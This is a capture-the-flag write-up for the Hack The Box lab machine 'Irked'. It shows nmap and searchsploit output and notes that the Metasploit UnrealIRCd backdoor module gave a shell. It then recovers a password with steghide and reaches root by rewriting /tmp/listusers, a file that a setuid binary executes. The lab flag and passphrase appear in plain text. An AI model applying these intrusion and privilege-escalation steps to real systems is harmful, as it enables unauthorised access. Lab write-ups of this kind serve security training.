Exploit Unrealircd vulnerability with msf to get a user shell & exploit local suid binary to get a root shell.
Description
- Name:
Irked
- IP:
10.10.10.117
- Author:
MrAgent
- Difficulty:
4/10
Discovery
sudo nmap -sV -sC -sS -A -v -p- irked.htb -oA nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 50944/udp status
|_ 100024 1 52118/tcp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
52118/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Pwn
This is the index page of the web site
Trying to use gobuster to enumerate the directories can’t find anything useful, so we can move to search other exploits for the port 6697
and 8067
(irc).
searchsploit unrealircd
------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/opt/exploitdb/)
------------------------------------------------------------- ----------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
------------------------------------------------------------- ----------------------------------
The one available on metasploit is the UnrealIRCd 3.2.8.1
.
The exploit works and we get a shell.
The user flag is in the djmardov directory, but we can see the flag only if we are djmardov.
The word steg
in the .backup
file suggests us that djmardov uses some kind of steganography to encode his password.
Using steghide
on the web’s image, and using as password : UPupDOWNdownLR1rBAbaSSss
gives us the password for djmardov
.
In the victim’s machine, we can login with
ircd@irked:/home/djmardov/Documents$ su - djmardov
djmardov@irked:~$ cd Documents
cd Documents
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
We can use the find
command to see what files have the setuid permission set:
(4000 -> setuid),(2000 -> setgid),(1000 -> sticky bit).
The program that caught my attention is viewuser
.
If we try to execute viewuser
it gives us the following output
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2018-12-19 15:14 (:0)
djmardov pts/0 2018-12-19 15:15 (10.10.12.35)
djmardov pts/1 2018-12-19 15:15 (10.10.15.82)
djmardov pts/2 2018-12-19 15:15 (10.10.13.138)
djmardov pts/4 2018-12-19 15:16 (10.10.15.233)
djmardov pts/5 2018-12-19 15:16 (10.10.16.28)
djmardov pts/8 2018-12-19 15:17 (10.10.15.147)
djmardov pts/10 2018-12-19 15:22 (10.10.12.115)
djmardov pts/11 2018-12-19 15:23 (10.10.19.221)
sh: 1: /tmp/listusers: Permission denied
We can see that there’s some error on /tmp/listusers
. If we go in the /tmp
directory we can change the permission of the listusers
file and the contents of it adding to the end’s file cat /root/root.txt
or /bin/bash
And we get ROOT shell.